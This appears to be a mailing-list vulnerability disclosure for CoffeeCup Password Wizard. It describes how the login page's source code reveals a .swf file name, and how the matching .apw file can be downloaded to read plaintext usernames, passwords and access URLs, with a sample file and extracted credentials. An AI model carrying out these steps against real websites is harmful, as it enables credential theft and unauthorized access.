Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

[Rynho Zeros Web <hackargentino () gmx net>]

+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions

+ Product: CoffeeCup Password Wizard All Versions

+ Vendor: CoffeeCup Software, Inc.

+ Site: http://www.coffeecup.com/java-password/

+ About CoffeeCup Password Wizard: Create unlimited password protected pages

with unlimited usernames and passwords with CoffeeCup Password Wizard. 
You don't even have to know Flash, Java, or HTML ! Customize the look and 
feel to match your page. You can even point different users to different 
URLs ! Preview within the program or your favorite browser. It's all that 
easy ! All this and more make CoffeeCup Password Wizard the easiest way 
to password protect your pages ! (¿?)

+ Description: Easy obtaining of names of users, passwords and a URL
 of direct access to the preferences of the same one. 

+ Exploit:

go to the login panel, see sourcecode HTML in search of the location 
of the file .swf used to make login.

Example:

Go to
https://www.victim.com/billing/

See sourcecode, 

[...]
        ID=billing WIDTH=146 HEIGHT=125>
        <PARAM NAME=movie VALUE="billing.swf">
        <PARAM NAME=quality VALUE=high>
[...]

(https://www.victim.com/billing/billing.swf)

the file of the passwords is called just as the file of login, but with 
the extension .apw

now, go to & download the file:
https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
Wizard File)

by I complete it opens east file with any text editor and found all the
users 
with its passwords and the URL of direct access to its options. 

Example of passwords file:

--------- billing.apw -----------

COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!

MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billing\
MOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE

USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username

PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password

BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1

ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm 
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm 
[...]
END

--------- billing.apw -----------

Example of user & pass on billing:

user: anyweb
pass: xnet0305
url option panel: https://www.victim.com/billing/anyweb0001.htm


----------------------------------------------------------------

[EOF]

-----------------------------------------------
Credits: ToOcOoL (http://www.valenciahack.com/)
-----------------------------------------------

--------------------------------
Note: sorry by my bad english ;)
--------------------------------

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!